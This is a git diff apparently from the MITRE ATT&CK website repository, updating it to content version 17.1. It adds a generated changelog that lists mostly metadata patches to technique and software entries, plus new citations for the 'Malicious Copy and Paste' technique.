diff --git a/CHANGELOG.md b/CHANGELOG.md index 31321a5ebed..c207ffb63da 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,3 +1,10 @@ +# v4.2.3 (2025-05-06) + +## Features + +* Release ATT&CK content version 17.1. + See detailed changes [here](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.1). + # v4.2.2 (2025-04-22) ## Features diff --git a/data/versions.json b/data/versions.json index c251d558c29..4acef7cef2f 100644 --- a/data/versions.json +++ b/data/versions.json @@ -1,9 +1,9 @@ { "current": { - "name": "v17.0", + "name": "v17.1", "date_start": "April 22, 2025", "changelog": "updates-april-2025", - "cti_url": "https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.0" + "cti_url": "https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.1" }, "previous": [ { diff --git a/docs/RELEASE.md b/docs/RELEASE.md index 21708d51679..ad084b9a9c2 100644 --- a/docs/RELEASE.md +++ b/docs/RELEASE.md @@ -133,6 +133,8 @@ Consult these sections as needed for step 5 in the above list. * Release [ATT&CK content version X.Y](https://github.com/mitre/cti/releases/tag/ATT%26CK-vX.Y). See the release notes [here](https://attack.mitre.org/resources/updates/updates--/). ``` +* Update the `layer_version` and `navigator_version` in `modules/site_config.py` if navigator version or navigator layer version has been updated.
+Check the layer specification version [here](https://github.com/mitre-attack/attack-navigator/blob/master/layers/spec/) and the navigator version [here](https://github.com/mitre-attack/attack-navigator/blob/master/CHANGELOG.md). ### Minor release @@ -150,3 +152,5 @@ Consult these sections as needed for step 5 in the above list. * Release ATT&CK content version X.Y. See detailed changes [here](https://github.com/mitre/cti/releases/tag/ATT%26CK-vX.Y). ``` +* Update the `layer_version` and `navigator_version` in `modules/site_config.py` if navigator version or navigator layer version has been updated.
+Check the layer specification version [here](https://github.com/mitre-attack/attack-navigator/blob/master/layers/spec/) and the navigator version [here](https://github.com/mitre-attack/attack-navigator/blob/master/CHANGELOG.md). diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/changelog-detailed.html b/modules/resources/docs/changelogs/v17.0-v17.1/changelog-detailed.html new file mode 100644 index 00000000000..9b22c9645b6 --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/changelog-detailed.html @@ -0,0 +1,93 @@ + + + + ATT&CK Changes + + + + +

ATT&CK Changes Between v17.0 and v17.1

Key

+ + + + +
+ + + + + +
Colors for description field
Added
Changed
Deleted
+
+

Additional formats

+

These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.

+ +

This JSON file contains the machine readble output used to create this page: changelog.json

+

Techniques

enterprise-attack

Patches

[T1546.011] Event Triggered Execution: Application Shimming

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:26.274000+00:002025-04-25 14:46:29.459000+00:00

[T1055.004] Process Injection: Asynchronous Procedure Call

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:44.390000+00:002025-04-25 14:47:11.435000+00:00

[T1102.002] Web Service: Bidirectional Communication

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:03.009000+00:002025-04-25 14:47:51.598000+00:00

[T1027.001] Obfuscated Files or Information: Binary Padding

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:17.215000+00:002025-04-25 14:46:48.991000+00:00

[T1185] Browser Session Hijacking

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:32.147000+00:002025-04-25 15:15:33.428000+00:00

[T1574.012] Hijack Execution Flow: COR_PROFILER

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:25.301000+00:002025-04-25 14:48:41.257000+00:00

[T1559.001] Inter-Process Communication: Component Object Model

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:18.425000+00:002025-04-25 14:46:14.161000+00:00

[T1218.002] System Binary Proxy Execution: Control Panel

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:29.962000+00:002025-04-25 14:46:37.731000+00:00

[T1568.003] Dynamic Resolution: DNS Calculation

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:47.388000+00:002025-04-25 14:47:18.343000+00:00

[T1102.001] Web Service: Dead Drop Resolver

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:22.651000+00:002025-04-25 14:48:36.031000+00:00

[T1491] Defacement

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:33.958000+00:002025-04-25 15:15:35.374000+00:00

[T1600.002] Weaken Encryption: Disable Crypto Hardware

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:45.787000+00:002025-04-25 14:47:14.891000+00:00

[T1090.004] Proxy: Domain Fronting

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:20.863000+00:002025-04-25 14:48:02.492000+00:00

[T1601.002] Modify System Image: Downgrade System Image

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:24.391000+00:002025-04-25 14:48:39.086000+00:00

[T1568] Dynamic Resolution

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:44.211000+00:002025-04-25 15:15:46.359000+00:00

[T1055.011] Process Injection: Extra Window Memory Injection

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:00.917000+00:002025-04-25 14:45:37.275000+00:00

[T1008] Fallback Channels

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:20.736000+00:002025-04-25 15:16:21.879000+00:00

[T1568.001] Dynamic Resolution: Fast Flux DNS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:16.171000+00:002025-04-25 14:46:09.378000+00:00

[T1558.001] Steal or Forge Kerberos Tickets: Golden Ticket

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:42.362000+00:002025-04-25 14:47:07.443000+00:00

[T1564.005] Hide Artifacts: Hidden File System

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:14.404000+00:002025-04-25 14:48:18.639000+00:00

[T1564.001] Hide Artifacts: Hidden Files and Directories

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:19.293000+00:002025-04-25 14:48:27.868000+00:00

[T1176.002] Software Extensions: IDE Extensions

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:37.231000+00:002025-04-23 12:40:46.664000+00:00
x_mitre_contributors[0]Raghvendra MishraRaghvendra Mishra, Arista Networks

[T1219.001] Remote Access Tools: IDE Tunneling

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Purinut Wongwaiwuttiguldej']
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:42.909000+00:002025-04-22 16:34:13.454000+00:00

[T1505.004] Server Software Component: IIS Components

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:59.560000+00:002025-04-25 14:47:43.995000+00:00

[T1525] Implant Internal Image

Current version: 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:29.793000+00:002025-04-25 15:15:30.983000+00:00

[T1218.004] System Binary Proxy Execution: InstallUtil

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:17.302000+00:002025-04-25 14:46:11.581000+00:00

[T1016.001] System Network Configuration Discovery: Internet Connection Discovery

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:08.048000+00:002025-04-25 14:45:52.631000+00:00

[T1114.001] Email Collection: Local Email Collection

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:12.090000+00:002025-04-25 14:46:00.964000+00:00

[T1204.004] User Execution: Malicious Copy and Paste

Current version: 1.0

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +

Old Description
New Description
t1An adversary may rely upon a user copying and pasting code it1An adversary may rely upon a user copying and pasting code i
>n order to gain execution. Users may be subjected to social >n order to gain execution. Users may be subjected to social 
>engineering to get them to copy and paste code directly into>engineering to get them to copy and paste code directly into
> a [Command and Scripting Interpreter](https://attack.mitre.> a [Command and Scripting Interpreter](https://attack.mitre.
>org/techniques/T1059).    Malicious websites, such as those >org/techniques/T1059).    Malicious websites, such as those 
>used in [Drive-by Compromise](https://attack.mitre.org/techn>used in [Drive-by Compromise](https://attack.mitre.org/techn
>iques/T1189), may present fake error messages or CAPTCHA pro>iques/T1189), may present fake error messages or CAPTCHA pro
>mpts that instruct users to open a terminal or the Windows R>mpts that instruct users to open a terminal or the Windows R
>un Dialog box and execute an arbitrary command. These comman>un Dialog box and execute an arbitrary command. These comman
>ds may be obfuscated using encoding or other techniques to c>ds may be obfuscated using encoding or other techniques to c
>onceal malicious intent. Once executed, the adversary will t>onceal malicious intent. Once executed, the adversary will t
>ypically be able to establish a foothold on the victim's mac>ypically be able to establish a foothold on the victim's mac
>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi>hine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoi
>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)  Advers>a ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citatio
>aries may also leverage phishing emails for this purpose. Wh>n: AhnLab LummaC2 2025)  Adversaries may also leverage phish
>en a user attempts to open an attachment, they may be presen>ing emails for this purpose. When a user attempts to open an
>ted with a fake error and offered a malicious command to pas> attachment, they may be presented with a fake error and off
>te as a solution.(Citation: Proofpoint ClickFix 2024)   Tric>ered a malicious command to paste as a solution.(Citation: P
>king a user into executing a command themselves may help to >roofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Pas
>bypass email filtering, browser sandboxing, or other mitigat>te 2024)  Tricking a user into executing a command themselve
>ions designed to protect users against malicious downloaded >s may help to bypass email filtering, browser sandboxing, or
>files. > other mitigations designed to protect users against malicio
 >us downloaded files. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_remote_supportFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:15.487000+00:002025-04-30 17:53:48.667000+00:00
descriptionAn adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). + +Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024) + +Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024) + +Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). + +Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. 
Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025) + +Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024) + +Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.
x_mitre_contributors[6]seungyoul.yoo@ahnlab.comSeungYoul Yoo, Ahn Lab
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'AhnLab Malicioys Copy Paste 2024', 'description': 'AhnLab SEcurity intelligence Center. (2024, May 23). Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V). Retrieved April 23, 2025.', 'url': 'https://asec.ahnlab.com/en/73952/'}
external_references{'source_name': 'AhnLab LummaC2 2025', 'description': 'AhnLab SEcurity intelligence Center. (2025, January 8). Infostealer LummaC2 Spreading Through Fake CAPTCHA Verification Page. Retrieved April 23, 2025.', 'url': 'https://asec.ahnlab.com/en/85699/'}

[T1204.003] User Execution: Malicious Image

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:58.109000+00:002025-04-25 14:47:40.745000+00:00

[T1601] Modify System Image

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:57.683000+00:002025-04-25 15:15:59.227000+00:00

[T1218.005] System Binary Proxy Execution: Mshta

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:47.701000+00:002025-04-25 14:47:18.707000+00:00

[T1104] Multi-Stage Channels

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:48.060000+00:002025-04-25 15:15:50.032000+00:00

[T1599.001] Network Boundary Bridging: Network Address Translation Traversal

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:30.055000+00:002025-04-25 14:46:38.101000+00:00

[T1602.002] Data from Configuration Repository: Network Device Configuration Dump

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:31.045000+00:002025-04-25 14:46:40.804000+00:00

[T1132.002] Data Encoding: Non-Standard Encoding

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:11.823000+00:002025-04-25 14:48:12.613000+00:00

[T1218.008] System Binary Proxy Execution: Odbcconf

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:39.912000+00:002025-04-25 14:47:01.231000+00:00

[T1102.003] Web Service: One-Way Communication

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:53.389000+00:002025-04-25 14:47:30.432000+00:00

[T1601.001] Modify System Image: Patch System Image

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:10.610000+00:002025-04-25 14:48:09.178000+00:00

[T1120] Peripheral Device Discovery

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:16.397000+00:002025-04-25 15:15:22.038000+00:00

[T1205.001] Traffic Signaling: Port Knocking

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:49.044000+00:002025-04-25 14:47:21.421000+00:00

[T1055.002] Process Injection: Portable Executable Injection

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:46.232000+00:002025-04-25 14:47:15.984000+00:00

[T1055.009] Process Injection: Proc Memory

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:10.291000+00:002025-04-25 14:48:08.263000+00:00

[T1564.010] Hide Artifacts: Process Argument Spoofing

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:25.123000+00:002025-04-25 14:48:40.519000+00:00

[T1055.013] Process Injection: Process Doppelgänging

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:40.683000+00:002025-04-25 14:47:03.621000+00:00

[T1090] Proxy

Current version: 3.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:41.686000+00:002025-04-25 15:15:44.084000+00:00

[T1055.008] Process Injection: Ptrace System Calls

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:18.215000+00:002025-04-25 14:48:25.896000+00:00

[T1542.004] Pre-OS Boot: ROMMONkit

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:55.910000+00:002025-04-25 14:47:36.549000+00:00

[T1600.001] Weaken Encryption: Reduce Key Space

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:23.689000+00:002025-04-25 14:46:24.048000+00:00

[T1218.009] System Binary Proxy Execution: Regsvcs/Regasm

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:05.911000+00:002025-04-25 14:47:58.456000+00:00

[T1219.003] Remote Access Tools: Remote Access Hardware

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 17:20:16.375000+00:002025-05-02 19:13:42.314000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsMichael Davis, ServiceNow Threat Intelligence
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsMichael Davis @ ServiceNow Threat Intelligence

[T1578.004] Modify Cloud Compute Infrastructure: Revert Cloud Instance

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:03.446000+00:002025-04-25 14:45:42.495000+00:00

[T1207] Rogue Domain Controller

Current version: 2.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:32.959000+00:002025-04-25 15:15:34.258000+00:00

[T1134.005] Access Token Manipulation: SID-History Injection

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:00.556000+00:002025-04-25 14:47:45.982000+00:00

[T1602.001] Data from Configuration Repository: SNMP (MIB Dump)

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:19.943000+00:002025-04-25 14:48:29.549000+00:00

[T1562.009] Impair Defenses: Safe Mode Boot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:15.415000+00:002025-04-25 14:46:08.076000+00:00

[T1547.005] Boot or Logon Autostart Execution: Security Support Provider

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:30.225000+00:002025-04-25 14:46:38.641000+00:00

[T1574.010] Hijack Execution Flow: Services File Permissions Weakness

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:18.533000+00:002025-04-25 14:47:32.419000+00:00

[T1558.002] Steal or Forge Kerberos Tickets: Silver Ticket

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:10.698000+00:002025-04-25 14:48:09.547000+00:00

[T1036.006] Masquerading: Space after Filename

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:22.189000+00:002025-04-25 14:48:22.412000+00:00

[T1001.002] Data Obfuscation: Steganography

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:20.025000+00:002025-04-25 14:48:29.907000+00:00

[T1548.003] Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:08.135000+00:002025-04-25 14:45:52.996000+00:00

[T1614.001] System Location Discovery: System Language Discovery

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:04.692000+00:002025-04-25 14:47:55.750000+00:00

[T1542.005] Pre-OS Boot: TFTP Boot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:15.890000+00:002025-04-25 14:46:08.824000+00:00

[T1221] Template Injection

Current version: 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:13.447000+00:002025-04-25 15:16:15.516000+00:00

[T1055.003] Process Injection: Thread Execution Hijacking

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:26.012000+00:002025-04-25 14:46:28.558000+00:00

[T1055.005] Process Injection: Thread Local Storage

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:16.376000+00:002025-04-25 14:48:21.860000+00:00

[T1505.002] Server Software Component: Transport Agent

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:21.139000+00:002025-04-25 14:46:19.364000+00:00

[T1546.005] Event Triggered Execution: Trap

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:36.056000+00:002025-04-25 14:46:52.100000+00:00

[T1564.007] Hide Artifacts: VBA Stomping

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:59:06.926000+00:002025-04-25 14:48:00.627000+00:00

[T1125] Video Capture

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:17.864000+00:002025-04-25 15:15:42.332000+00:00

[T1600] Weaken Encryption

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-15 19:58:12.571000+00:002025-04-25 15:15:15.040000+00:00

mobile-attack

Patches

[T1577] Compromise Application Executable

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:21:56.351000+00:002025-04-25 15:16:40.355000+00:00

[T1617] Hooking

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:21:55.543000+00:002025-04-25 15:16:39.824000+00:00

[T1603] Scheduled Task/Job

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:21:43.650000+00:002025-04-25 15:16:26.617000+00:00

ics-attack

Patches

[T0800] Activate Firmware Update Mode

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:10.552000+00:002025-04-25 15:16:44.679000+00:00

[T0872] Indicator Removal on Host

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:14.295000+00:002025-04-25 15:16:47.841000+00:00

[T0801] Monitor Process State

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:12.337000+00:002025-04-25 15:16:45.982000+00:00

[T0845] Program Upload

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:12.867000+00:002025-04-25 15:16:46.293000+00:00

[T0852] Screen Capture

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:18.404000+00:002025-04-25 15:16:51.447000+00:00

[T0869] Standard Application Layer Protocol

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:19.328000+00:002025-04-25 15:16:52.173000+00:00

[T0882] Theft of Operational Information

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 21:26:17.698000+00:002025-04-25 15:16:50.981000+00:00

Software

enterprise-attack

Patches

[S0066] 3PARA RAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:18.768000+00:002025-04-25 14:43:49.838000+00:00

[S0065] 4H RAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:22.132000+00:002025-04-25 14:44:01.375000+00:00

[S0469] ABK

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
